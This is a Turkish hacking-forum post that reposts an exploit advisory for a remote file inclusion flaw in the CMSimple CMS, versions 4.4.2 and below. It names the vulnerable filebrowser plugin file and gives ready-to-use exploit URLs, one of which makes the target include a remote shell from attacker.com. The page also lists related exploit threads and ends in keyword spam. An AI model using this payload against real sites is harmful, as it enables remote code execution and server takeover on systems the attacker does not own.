Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
CMSimple RFI Veritabanı Yok - Dosya Tarayıcısını İndirme Açığı
#1
Kod:
[o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability

       Software : CMSimple - Open Source CMS with no database
       Version  : 4.4, 4.4.2 and below
       Vendor   : http://www.cmsimple.org
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com
       Desc     : CMSimple is a php based Content Managemant System (CMS), which requires no database.
                  All data are stored in a simple file system.


=============================================================================================================


  [o] Vulnerable File

       plugins/filebrowser/classes/required_classes.php

        require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
        require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';


=============================================================================================================


  [o] Exploit

       http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI]


=============================================================================================================


  [o] PoC

       http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?


=============================================================================================================

Kaynak =>
Kod:
http://www.exploit-db.com/exploits/32930/
www.deccal.org


Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Developed By IT Look Admin Sayfası Atlatma Açığı KingSkrupellos 10 165 16 dakika önce
Son Yorum: 404 hack
  UpL Image Board_2 Content Dosya Yükleme Açığı KingSkrupellos 6 122 Dün, Saat: 22:56
Son Yorum: GECEGEZEN
  MyBB Forum usercp.php?action=avatar Açığı KingSkrupellos 233 12,027 Dün, Saat: 14:55
Son Yorum: Trajedi
  Joomla Com_Cckjseblod Auto Exploiter FTP Config İndirme Exploit KingSkrupellos 13 255 Dün, Saat: 09:56
Son Yorum: anubis
  Desenvolvido de Markcerto SQL Enjeksiyon Açığı KingSkrupellos 12 229 08-12-2016, Saat: 20:37
Son Yorum: _Golge
Anahtar Kelimeler

CMSimple RFI Veritabanı Yok - Dosya Tarayıcısını İndirme Açığı indir, CMSimple RFI Veritabanı Yok - Dosya Tarayıcısını İndirme Açığı Videosu, CMSimple RFI Veritabanı Yok - Dosya Tarayıcısını İndirme Açığı Online izle, CMSimple RFI Veritabanı Yok - Dosya Tarayıcısını İndirme Açığı Bedava indir, CMSimple RFI Veritabanı Yok - Dosya Tarayıcısını İndirme Açığı Yükle, CMSimple RFI Veritabanı Yok - Dosya Tarayıcısını İndirme Açığı Hakkında, CMSimple RFI Veritabanı Yok - Dosya Tarayıcısını İndirme Açığı Nedir, CMSimple RFI Veritabanı Yok - Dosya Tarayıcısını İndirme Açığı Free indir, CMSimple RFI Veritabanı Yok - Dosya Tarayıcısını İndirme Açığı Oyunu, CMSimple RFI Veritabanı Yok - Dosya Tarayıcısını İndirme Açığı Download


1 Ziyaretçi